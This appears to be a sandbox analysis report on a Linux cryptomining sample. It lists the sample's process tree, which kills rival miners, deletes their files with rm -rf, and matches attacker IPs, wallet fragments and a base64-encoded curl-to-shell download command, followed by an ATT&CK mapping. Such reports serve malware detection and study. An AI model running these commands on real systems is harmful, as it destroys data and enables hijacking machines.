/usr/bin/kill
kill -9 1109
3⤵
PID:1112

/sbin/kill
kill -9 1109
3⤵
PID:1112

/bin/kill
kill -9 1109
3⤵
PID:1112

/bin/grep
grep xiaoxue
2⤵
PID:1114

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:1113

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1116

/usr/local/sbin/kill
kill -9 1114
3⤵
PID:1117

/usr/local/bin/kill
kill -9 1114
3⤵
PID:1117

/usr/sbin/kill
kill -9 1114
3⤵
PID:1117

/usr/bin/kill
kill -9 1114
3⤵
PID:1117

/sbin/kill
kill -9 1114
3⤵
PID:1117

/bin/kill
kill -9 1114
3⤵
- Reads CPU attributes
PID:1117

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1115

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:1120

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1121

/bin/grep
grep 46.243.253.15
2⤵
PID:1119

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1123

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1122

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1127

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:1126

/bin/grep
grep 176.31.6.16
2⤵
PID:1125

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1129

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1128

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1131

/usr/bin/pgrep
pgrep -f L2Jpbi9iYXN
2⤵
PID:1130

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1133

/usr/bin/pgrep
pgrep -f xzpauectgr
2⤵
PID:1132

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1135

/usr/bin/pgrep
pgrep -f slxfbkmxtd
2⤵
- Reads CPU attributes
PID:1134

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1137

/usr/bin/pgrep
pgrep -f mixtape
2⤵
PID:1136

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1139

/usr/bin/pgrep
pgrep -f addnj
2⤵
PID:1138

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1141

/usr/bin/pgrep
pgrep -f 200.68.17.196
2⤵
PID:1140

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1143

/usr/bin/pgrep
pgrep -f IyEvYmluL3NoCgpzUG
2⤵
PID:1142

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1145

/usr/bin/pgrep
pgrep -f KHdnZXQgLXFPLSBodHRw
2⤵
PID:1144

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1147

/usr/bin/pgrep
pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3
2⤵
- Reads runtime system information
PID:1146

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1149

/usr/bin/pgrep
pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo
2⤵
PID:1148

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1151

/usr/bin/pgrep
pgrep -f mwyumwdbpq.conf
2⤵
PID:1150

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1153

/usr/bin/pgrep
pgrep -f honvbsasbf.conf
2⤵
PID:1152

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1155

/usr/bin/pgrep
pgrep -f mqdsflm.cf
2⤵
PID:1154

/usr/bin/pgrep
pgrep -f lower.sh
2⤵
- Reads runtime system information
PID:1156

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1157

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1159

/usr/bin/pgrep
pgrep -f ./ppp
2⤵
PID:1158

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1161

/usr/bin/pgrep
pgrep -f cryptonight
2⤵
PID:1160

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1163

/usr/bin/pgrep
pgrep -f ./seervceaess
2⤵
PID:1162

/usr/bin/pgrep
pgrep -f ./servceaess
2⤵
PID:1164

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1165

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1167

/usr/bin/pgrep
pgrep -f ./servceas
2⤵
PID:1166

/usr/bin/pgrep
pgrep -f ./servcesa
2⤵
- Reads CPU attributes
PID:1168

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1169

/usr/bin/pgrep
pgrep -f ./vsp
2⤵
- Reads CPU attributes
PID:1170

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1171

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1173

/usr/bin/pgrep
pgrep -f ./jvs
2⤵
- Reads runtime system information
PID:1172

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1175

/usr/bin/pgrep
pgrep -f ./pvv
2⤵
PID:1174

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1177

/usr/bin/pgrep
pgrep -f ./vpp
2⤵
- Reads runtime system information
PID:1176

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1179

/usr/bin/pgrep
pgrep -f ./pces
2⤵
PID:1178

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1181

/usr/bin/pgrep
pgrep -f ./rspce
2⤵
PID:1180

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1183

/usr/bin/pgrep
pgrep -f ./haveged
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1182

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1185

/usr/bin/pgrep
pgrep -f ./jiba
2⤵
- Reads CPU attributes
PID:1184

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1187

/usr/bin/pgrep
pgrep -f ./watchbog
2⤵
- Reads runtime system information
PID:1186

/usr/bin/pgrep
pgrep -f ./A7mA5gb
2⤵
- Reads CPU attributes
PID:1188

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1189

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1191

/usr/bin/pgrep
pgrep -f kacpi_svc
2⤵
PID:1190

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1193

/usr/bin/pgrep
pgrep -f kswap_svc
2⤵
PID:1192

/usr/bin/pgrep
pgrep -f kauditd_svc
2⤵
PID:1194

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1195

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1197

/usr/bin/pgrep
pgrep -f kpsmoused_svc
2⤵
- Reads runtime system information
PID:1196

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1199

/usr/bin/pgrep
pgrep -f kseriod_svc
2⤵
PID:1198

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1201

/usr/bin/pgrep
pgrep -f kthreadd_svc
2⤵
PID:1200

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1203

/usr/bin/pgrep
pgrep -f ksoftirqd_svc
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1202

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1205

/usr/bin/pgrep
pgrep -f kintegrityd_svc
2⤵
PID:1204

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1207

/usr/bin/pgrep
pgrep -f jawa
2⤵
- Reads CPU attributes
PID:1206

/usr/bin/pgrep
pgrep -f oracle.jpg
2⤵
PID:1208

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1209

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1211

/usr/bin/pgrep
pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN
2⤵
PID:1210

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1213

/usr/bin/pgrep
pgrep -f 188.209.49.54
2⤵
PID:1212

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1215

/usr/bin/pgrep
pgrep -f 181.214.87.241
2⤵
PID:1214

/usr/bin/pgrep
pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ
2⤵
PID:1216

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1217

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1219

/usr/bin/pgrep
pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj
2⤵
PID:1218

/usr/bin/pgrep
pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK
2⤵
PID:1220

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1221

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1223

/usr/bin/pgrep
pgrep -f servim
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1222

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1225

/usr/bin/pgrep
pgrep -f kblockd_svc
2⤵
PID:1224

/usr/bin/pgrep
pgrep -f native_svc
2⤵
- Reads CPU attributes
PID:1226

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1227

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1229

/usr/bin/pgrep
pgrep -f ynn
2⤵
PID:1228

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1231

/usr/bin/pgrep
pgrep -f 65ccEJ7
2⤵
PID:1230

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1233

/usr/bin/pgrep
pgrep -f jmxx
2⤵
PID:1232

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1235

/usr/bin/pgrep
pgrep -f 2Ne80nA
2⤵
- Reads CPU attributes
PID:1234

/usr/bin/pgrep
pgrep -f sysstats
2⤵
- Reads CPU attributes
PID:1236

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1237

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1239

/usr/bin/pgrep
pgrep -f systemxlv
2⤵
- Reads CPU attributes
PID:1238

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1241

/usr/bin/pgrep
pgrep -f watchbog
2⤵
PID:1240

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1243

/usr/bin/pgrep
pgrep -f OIcJi1m
2⤵
PID:1242

/usr/bin/pkill
pkill -f biosetjenkins
2⤵
PID:1244

/usr/bin/pkill
pkill -f Loopback
2⤵
PID:1245

/usr/bin/pkill
pkill -f apaceha
2⤵
PID:1246

/usr/bin/pkill
pkill -f cryptonight
2⤵
- Reads runtime system information
PID:1247

/usr/bin/pkill
pkill -f mixnerdx
2⤵
PID:1248

/usr/bin/pkill
pkill -f performedl
2⤵
PID:1249

/usr/bin/pkill
pkill -f JnKihGjn
2⤵
- Reads CPU attributes
PID:1250

/usr/bin/pkill
pkill -f irqba2anc1
2⤵
PID:1251

/usr/bin/pkill
pkill -f irqba5xnc1
2⤵
- Reads runtime system information
PID:1252

/usr/bin/pkill
pkill -f irqbnc1
2⤵
- Reads CPU attributes
PID:1253

/usr/bin/pkill
pkill -f ir29xc1
2⤵
PID:1254

/usr/bin/pkill
pkill -f conns
2⤵
- Reads CPU attributes
PID:1255

/usr/bin/pkill
pkill -f irqbalance
2⤵
- Reads CPU attributes
PID:1256

/usr/bin/pkill
pkill -f crypto-pool
2⤵
PID:1257

/usr/bin/pkill
pkill -f XJnRj
2⤵
PID:1258

/usr/bin/pkill
pkill -f mgwsl
2⤵
PID:1259

/usr/bin/pkill
pkill -f pythno
2⤵
PID:1260

/usr/bin/pkill
pkill -f jweri
2⤵
PID:1261

/usr/bin/pkill
pkill -f lx26
2⤵
PID:1262

/usr/bin/pkill
pkill -f NXLAi
2⤵
- Reads CPU attributes
PID:1263

/usr/bin/pkill
pkill -f BI5zj
2⤵
PID:1264

/usr/bin/pkill
pkill -f askdljlqw
2⤵
PID:1265

/usr/bin/pkill
pkill -f minerd
2⤵
PID:1266

/usr/bin/pkill
pkill -f minergate
2⤵
PID:1267

/usr/bin/pkill
pkill -f Guard.sh
2⤵
PID:1268

/usr/bin/pkill
pkill -f ysaydh
2⤵
PID:1269

/usr/bin/pkill
pkill -f bonns
2⤵
PID:1270

/usr/bin/pkill
pkill -f donns
2⤵
PID:1271

/usr/bin/pkill
pkill -f kxjd
2⤵
- Reads CPU attributes
PID:1272

/usr/bin/pkill
pkill -f Duck.sh
2⤵
- Reads runtime system information
PID:1273

/usr/bin/pkill
pkill -f bonn.sh
2⤵
PID:1274

/usr/bin/pkill
pkill -f conn.sh
2⤵
PID:1275

/usr/bin/pkill
pkill -f kworker34
2⤵
PID:1276

/usr/bin/pkill
pkill -f kw.sh
2⤵
PID:1277

/usr/bin/pkill
pkill -f pro.sh
2⤵
- Reads CPU attributes
PID:1278

/usr/bin/pkill
pkill -f polkitd
2⤵
PID:1279

/usr/bin/pkill
pkill -f acpid
2⤵
PID:1280

/usr/bin/pkill
pkill -f icb5o
2⤵
PID:1281

/usr/bin/pkill
pkill -f nopxi
2⤵
PID:1282

/usr/bin/pkill
pkill -f irqbalanc1
2⤵
PID:1283

/usr/bin/pkill
pkill -f minerd
2⤵
- Reads runtime system information
PID:1284

/usr/bin/pkill
pkill -f i586
2⤵
PID:1285

/usr/bin/pkill
pkill -f gddr
2⤵
PID:1286

/usr/bin/pkill
pkill -f mstxmr
2⤵
PID:1287

/usr/bin/pkill
pkill -f ddg.2011
2⤵
PID:1288

/usr/bin/pkill
pkill -f wnTKYg
2⤵
PID:1289

/usr/bin/pkill
pkill -f deamon
2⤵
- Reads CPU attributes
PID:1290

/usr/bin/pkill
pkill -f disk_genius
2⤵
PID:1291

/usr/bin/pkill
pkill -f sourplum
2⤵
PID:1292

/usr/bin/pkill
pkill -f polkitd
2⤵
- Reads runtime system information
PID:1293

/usr/bin/pkill
pkill -f nanoWatch
2⤵
PID:1294

/usr/bin/pkill
pkill -f zigw
2⤵
PID:1295

/usr/bin/pkill
pkill -f devtool
2⤵
PID:1296

/usr/bin/pkill
pkill -f devtools
2⤵
- Reads runtime system information
PID:1297

/usr/bin/pkill
pkill -f systemctI
2⤵
PID:1298

/usr/bin/pkill
pkill -f watchbog
2⤵
PID:1299

/usr/bin/pkill
pkill -f cryptonight
2⤵
PID:1300

/usr/bin/pkill
pkill -f sustes
2⤵
PID:1301

/usr/bin/pkill
pkill -f xmrig
2⤵
PID:1302

/usr/bin/pkill
pkill -f xmrig-cpu
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1303

/usr/bin/pkill
pkill -f 121.42.151.137
2⤵
PID:1304

/usr/bin/pkill
pkill -f init12.cfg
2⤵
PID:1305

/usr/bin/pkill
pkill -f nginxk
2⤵
- Reads CPU attributes
PID:1306

/usr/bin/pkill
pkill -f tmp/wc.conf
2⤵
PID:1307

/usr/bin/pkill
pkill -f xmrig-notls
2⤵
- Reads CPU attributes
PID:1308

/usr/bin/pkill
pkill -f xmr-stak
2⤵
- Reads runtime system information
PID:1309

/usr/bin/pkill
pkill -f suppoie
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1310

/usr/bin/pkill
pkill -f zer0day.ru
2⤵
- Reads runtime system information
PID:1311

/usr/bin/pkill
pkill -f dbus-daemon--system
2⤵
- Reads CPU attributes
PID:1312

/usr/bin/pkill
pkill -f nullcrew
2⤵
PID:1313

/usr/bin/pkill
pkill -f systemctI
2⤵
- Reads runtime system information
PID:1314

/usr/bin/pkill
pkill -f kworkerds
2⤵
PID:1315

/usr/bin/pkill
pkill -f init10.cfg
2⤵
PID:1316

/usr/bin/pkill
pkill -f /wl.conf
2⤵
- Reads runtime system information
PID:1317

/usr/bin/pkill
pkill -f crond64
2⤵
- Reads runtime system information
PID:1318

/usr/bin/pkill
pkill -f sustse
2⤵
PID:1319

/usr/bin/pkill
pkill -f vmlinuz
2⤵
PID:1320

/usr/bin/pkill
pkill -f exin
2⤵
- Reads CPU attributes
PID:1321

/usr/bin/pkill
pkill -f apachiii
2⤵
PID:1322

/usr/bin/pkill
pkill -f svcworkmanager
2⤵
PID:1323

/usr/bin/pkill
pkill -f xr
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1324

/bin/rm
rm -rf /usr/bin/config.json
2⤵
- Write file to user bin folder
PID:1325

/bin/rm
rm -rf /usr/bin/exin
2⤵
- Write file to user bin folder
PID:1326

/bin/rm
rm -rf /tmp/wc.conf
2⤵
PID:1327

/bin/rm
rm -rf /tmp/log_rot
2⤵
- Writes file to tmp directory
PID:1328

/bin/rm
rm -rf /tmp/apachiii
2⤵
PID:1329

/bin/rm
rm -rf /tmp/sustse
2⤵
- Writes file to tmp directory
PID:1330

/bin/rm
rm -rf /tmp/php
2⤵
- Writes file to tmp directory
PID:1331

/bin/rm
rm -rf /tmp/p2.conf
2⤵
PID:1332

/bin/rm
rm -rf /tmp/pprt
2⤵
PID:1333

/bin/rm
rm -rf /tmp/ppol
2⤵
PID:1334

/bin/rm
rm -rf /tmp/javax/config.sh
2⤵
PID:1335

/bin/rm
rm -rf /tmp/javax/sshd2
2⤵
- Writes file to tmp directory
PID:1336

/bin/rm
rm -rf /tmp/.profile
2⤵
- Writes file to tmp directory
PID:1337

/bin/rm
rm -rf /tmp/1.so
2⤵
- Writes file to tmp directory
PID:1338

/bin/rm
rm -rf /tmp/kworkerds
2⤵
PID:1339

/bin/rm
rm -rf /tmp/kworkerds3
2⤵
- Writes file to tmp directory
PID:1340

/bin/rm
rm -rf /tmp/kworkerdssx
2⤵
- Writes file to tmp directory
PID:1341

/bin/rm
rm -rf /tmp/xd.json
2⤵
- Writes file to tmp directory
PID:1342

/bin/rm
rm -rf /tmp/syslogd
2⤵
PID:1343

/bin/rm
rm -rf /tmp/syslogdb
2⤵
- Writes file to tmp directory
PID:1344

/bin/rm
rm -rf /tmp/65ccEJ7
2⤵
- Writes file to tmp directory
PID:1345

/bin/rm
rm -rf /tmp/jmxx
2⤵
PID:1346

/bin/rm
rm -rf /tmp/2Ne80nA
2⤵
- Writes file to tmp directory
PID:1347

/bin/rm
rm -rf /tmp/dl
2⤵
- Writes file to tmp directory
PID:1348

/bin/rm
rm -rf /tmp/ddg
2⤵
- Writes file to tmp directory
PID:1349

/bin/rm
rm -rf /tmp/systemxlv
2⤵
- Writes file to tmp directory
PID:1350

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Hijack Execution Flow

Scheduled Task

Privilege Escalation

Hijack Execution Flow

Scheduled Task

Defense Evasion

Hijack Execution Flow

3

T1574

Indicator Removal on Host

1

T1070

Credential Access

Discovery

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

description	ioc	process
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	kill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	kill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads